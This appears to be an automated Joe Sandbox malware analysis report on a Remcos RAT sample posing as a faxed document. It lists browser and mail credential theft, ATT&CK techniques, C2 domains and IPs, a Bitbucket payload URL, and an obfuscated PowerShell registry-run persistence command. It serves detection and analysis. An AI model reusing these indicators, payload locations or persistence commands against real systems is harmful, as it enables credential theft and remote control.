            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3052, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\alepoty.dat, type: DROPPED
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword12_2_004033F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword12_2_00402DB3
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword12_2_00402DB3
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3052, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7144, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3052, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\alepoty.dat, type: DROPPED
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts11
            Native API
            1
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            2
            Obfuscated Files or Information
            11
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts12
            Command and Scripting Interpreter
            Logon Script (Windows)412
            Process Injection
            1
            Software Packing
            1
            Credentials in Registry
            3
            File and Directory Discovery
            SMB/Windows Admin Shares11
            Input Capture
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell
            Login Hook1
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            NTDS27
            System Information Discovery
            Distributed Component Object Model2
            Clipboard Data
            2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets51
            Security Software Discovery
            SSHKeylogging113
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Modify Registry
            Cached Domain Credentials41
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
            Virtualization/Sandbox Evasion
            DCSync4
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583578 Sample: Faxed_6761fa19c0f9d_2938747... Startdate: 03/01/2025 Architecture: WINDOWS Score: 100 44 suregig.redirectme.net 2->44 46 s3-w.us-east-1.amazonaws.com 2->46 48 4 other IPs or domains 2->48 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Yara detected Remcos RAT 2->60 62 3 other signatures 2->62 10 Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe 20 2->10         started        signatures3 process4 file5 40 C:\Users\user\AppData\...\Thionylamine.asf, Unicode 10->40 dropped 72 Suspicious powershell command line found 10->72 14 powershell.exe 30 10->14         started        signatures6 process7 file8 42 Faxed_6761fa19c0f9...3364_221PLW.exe.exe, PE32 14->42 dropped 74 Early bird code injection technique detected 14->74 76 Writes to foreign memory regions 14->76 78 Found suspicious powershell code related to unpacking or dynamic code loading 14->78 80 3 other signatures 14->80 18 msiexec.exe 5 15 14->18         started        23 conhost.exe 14->23         started        signatures9 process10 dnsIp11 50 suregig.redirectme.net 45.74.19.119, 4688, 49785, 49791 HVC-ASUS United States 18->50 52 geoplugin.net 178.237.33.50, 49792, 80 ATOM86-ASATOM86NL Netherlands 18->52 54 2 other IPs or domains 18->54 38 C:\Users\user\AppData\Roaming\alepoty.dat, data 18->38 dropped 64 Tries to steal Mail credentials (via file registry) 18->64 66 Maps a DLL or memory area into another process 18->66 68 Installs a global keyboard hook 18->68 25 msiexec.exe 14 18->25         started        28 msiexec.exe 1 18->28         started        30 cmd.exe 1 18->30         started        32 3 other processes 18->32 file12 signatures13 process14 signatures15 70 Tries to harvest and steal browser information (history, passwords, etc) 25->70 34 conhost.exe 30->34         started        36 reg.exe 1 1 30->36         started        process16

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            suregig1.redirectme.net0%Avira URL Cloudsafe
            http://www.imvu.comta0%Avira URL Cloudsafe
            suregig.redirectme.net0%Avira URL Cloudsafe
            https://bbc-object-storage--frontbucket.us-east-1.prod.public0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            s3-w.us-east-1.amazonaws.com
            52.217.199.81
            truefalse
              high
              bitbucket.org
              185.166.143.49
              truefalse
                high
                geoplugin.net
                178.237.33.50
                truefalse
                  high
                  suregig.redirectme.net
                  45.74.19.119
                  truetrue
                    unknown
                    bbuseruploads.s3.amazonaws.com
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      suregig1.redirectme.nettrue
                      • Avira URL Cloud: safe
                      unknown
                      http://geoplugin.net/json.gpfalse
                        high
                        https://bitbucket.org/priestoph/new/downloads/rLjwANQEhWrjdfkI49.binfalse
                          high
                          suregig.redirectme.nettrue
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://bitbucket.org/msiexec.exe, 00000006.00000002.2896774357.00000000090E3000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://www.imvu.comrmsiexec.exe, 00000006.00000002.2908274107.0000000024EA0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2363503502.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              high
                              https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netmsiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.imvu.comtamsiexec.exe, 0000000E.00000003.2363320807.000000000332D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2363339733.000000000332D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://web-security-reports.services.atlassian.com/csp-report/bb-websitemsiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.0000000009108000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310414987.000000000914E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://www.imvu.commsiexec.exe, msiexec.exe, 0000000E.00000002.2363503502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2363320807.000000000332D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2363339733.000000000332D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://bbuseruploads.s3.amazonaws.com/867721d9-89dmsiexec.exe, 00000006.00000003.2323385728.0000000009113000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.nirsoft.netmsiexec.exe, 0000000B.00000002.2371823690.0000000002CF3000.00000004.00000010.00020000.00000000.sdmpfalse
                                          high
                                          http://nsis.sf.net/NSIS_ErrorErrorFaxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe, Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe.1.drfalse
                                            high
                                            https://web-security-reports.services.atlassian.com/csp-report/bb-website;9msiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://bbuseruploads.s3.amazonaws.com/amsiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netmsiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://dz8aopenkvv6s.cloudfront.netmsiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.0000000009108000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310414987.000000000914E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 00000006.00000002.2908274107.0000000024EA0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2363503502.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        high
                                                        https://www.google.commsiexec.exe, msiexec.exe, 0000000E.00000002.2363503502.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          high
                                                          https://remote-app-switcher.prod-east.frontend.public.atl-paas.netmsiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.0000000009108000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310414987.000000000914E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netmsiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://cdn.cookielaw.org/msiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.0000000009108000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310414987.000000000914E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://aui-cdn.atlassian.com/msiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.0000000009108000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310414987.000000000914E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://bbuseruploads.s3.amazonaws.com/~msiexec.exe, 00000006.00000002.2896774357.00000000090A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://bitbucket.org/priestoph/new/downloads/rLjwANQEhWrjdfkI49.bin6Yd?msiexec.exe, 00000006.00000002.2896774357.00000000090E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                                          high
                                                                          http://geoplugin.net/json.gpxemsiexec.exe, 00000006.00000002.2896774357.00000000090E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://login.yahoo.com/config/loginmsiexec.exefalse
                                                                              high
                                                                              https://remote-app-switcher.stg-east.frontend.public.atl-paas.netmsiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.0000000009108000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310414987.000000000914E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.nirsoft.net/msiexec.exe, 0000000E.00000002.2363503502.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://bitbucket.org/priestoph/new/downloads/rLjwANQEhWrjdfkI49.bin7msiexec.exe, 00000006.00000002.2896774357.00000000090A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://bbuseruploads.s3.amazonaws.com/msiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2896774357.00000000090A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://bbuseruploads.s3.amazonaws.com/867721d9-89d1-453c-b9b8-34e13023a504/downloads/8215feab-9e36-msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://bbc-object-storage--frontbucket.us-east-1.prod.publicmsiexec.exe, 00000006.00000003.2323385728.0000000009113000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.ebuddy.commsiexec.exe, msiexec.exe, 0000000E.00000002.2363503502.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          45.74.19.119
                                                                                          suregig.redirectme.netUnited States
                                                                                          29802HVC-ASUStrue
                                                                                          185.166.143.49
                                                                                          bitbucket.orgGermany
                                                                                          16509AMAZON-02USfalse
                                                                                          52.217.199.81
                                                                                          s3-w.us-east-1.amazonaws.comUnited States
                                                                                          16509AMAZON-02USfalse
                                                                                          178.237.33.50
                                                                                          geoplugin.netNetherlands
                                                                                          8455ATOM86-ASATOM86NLfalse
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1583578
                                                                                          Start date and time:2025-01-03 05:06:33 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 6m 53s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:16
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe
                                                                                          (renamed file extension from bin to exe)
                                                                                          Original Sample Name:Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.bin
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@21/21@4/4
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 99%
                                                                                          • Number of executed functions: 149
                                                                                          • Number of non-executed functions: 350
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          TimeTypeDescription
                                                                                          04:08:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ventetiders38 %Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)
                                                                                          04:08:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ventetiders38 %Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)
                                                                                          23:07:22API Interceptor35x Sleep call for process: powershell.exe modified
                                                                                          23:09:02API Interceptor94x Sleep call for process: msiexec.exe modified
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                          • jasonj002.bitbucket.io/
                                                                                          52.217.199.813z1I77NEin.exeGet hashmaliciousPhoenix Miner RedLineBrowse
                                                                                            178.237.33.50heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            SHROsQyiAd.exeGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            nikDoCvpJa.exeGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            17346150108fd59162a7f50db4b74cc85f1873b39cc8eaeab355e353b3b8b18e8e21fd369d493.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            s3-w.us-east-1.amazonaws.comDIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                            • 16.182.32.57
                                                                                            PersonnelPolicies.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                            • 16.182.35.201
                                                                                            https://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310Get hashmaliciousKnowBe4Browse
                                                                                            • 54.231.199.241
                                                                                            j6ks0Fxu6t.exeGet hashmaliciousLummaCBrowse
                                                                                            • 52.216.216.113
                                                                                            fnCae9FQhg.exeGet hashmaliciousLummaCBrowse
                                                                                            • 16.182.108.137
                                                                                            SFtDA07UDr.exeGet hashmaliciousLummaCBrowse
                                                                                            • 16.182.108.137
                                                                                            Gq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                                            • 3.5.8.193
                                                                                            2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                            • 52.217.14.36
                                                                                            tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                            • 16.15.177.52
                                                                                            iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                            • 3.5.17.0
                                                                                            bitbucket.orgEpsilon.exeGet hashmaliciousUnknownBrowse
                                                                                            • 185.166.143.48
                                                                                            j6ks0Fxu6t.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.166.143.50
                                                                                            fnCae9FQhg.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.166.143.48
                                                                                            SFtDA07UDr.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.166.143.48
                                                                                            Gq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                                            • 185.166.143.49
                                                                                            Gq48hjKhZf.exeGet hashmaliciousUnknownBrowse
                                                                                            • 185.166.143.48
                                                                                            2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.166.143.50
                                                                                            tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.166.143.48
                                                                                            iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.166.143.50
                                                                                            yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.166.143.50
                                                                                            geoplugin.netheteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            SHROsQyiAd.exeGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            nikDoCvpJa.exeGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            17346150108fd59162a7f50db4b74cc85f1873b39cc8eaeab355e353b3b8b18e8e21fd369d493.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            HVC-ASUSnshppc.elfGet hashmaliciousMiraiBrowse
                                                                                            • 46.21.151.164
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRATBrowse
                                                                                            • 194.126.174.112
                                                                                            loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                            • 66.232.99.243
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                            • 194.126.174.112
                                                                                            5.msiGet hashmaliciousDanaBot, NitolBrowse
                                                                                            • 23.227.178.53
                                                                                            Clienter.dll.dllGet hashmaliciousUnknownBrowse
                                                                                            • 104.254.130.186
                                                                                            mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 162.254.150.190
                                                                                            1.eGet hashmaliciousDanaBotBrowse
                                                                                            • 23.227.178.53
                                                                                            Coordination_Committee.exeGet hashmaliciousUnknownBrowse
                                                                                            • 162.252.175.33
                                                                                            Coordination_Committee.exeGet hashmaliciousUnknownBrowse
                                                                                            • 162.252.175.33
                                                                                            AMAZON-02USI686.elfGet hashmaliciousUnknownBrowse
                                                                                            • 54.171.230.55
                                                                                            x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 157.175.218.211
                                                                                            1.elfGet hashmaliciousUnknownBrowse
                                                                                            • 52.221.18.147
                                                                                            http://4.nscqn.dashboradcortx.xyz/4hbVgI3060FFjU163rczgakrldw288HJUBSXEIQRWLNTA425583MYLP8076x12Get hashmaliciousUnknownBrowse
                                                                                            • 35.161.242.225
                                                                                            wind.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                            • 54.171.230.55
                                                                                            https://myburbank-uat.3didemo.comGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 52.40.130.243
                                                                                            http://hotelyetipokhara.comGet hashmaliciousUnknownBrowse
                                                                                            • 13.33.187.21
                                                                                            1.elfGet hashmaliciousUnknownBrowse
                                                                                            • 13.32.82.152
                                                                                            http://boir.orgGet hashmaliciousUnknownBrowse
                                                                                            • 18.195.105.217
                                                                                            http://vaporblastingservices.comGet hashmaliciousUnknownBrowse
                                                                                            • 18.244.18.120
                                                                                            AMAZON-02USI686.elfGet hashmaliciousUnknownBrowse
                                                                                            • 54.171.230.55
                                                                                            x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 157.175.218.211
                                                                                            1.elfGet hashmaliciousUnknownBrowse
                                                                                            • 52.221.18.147
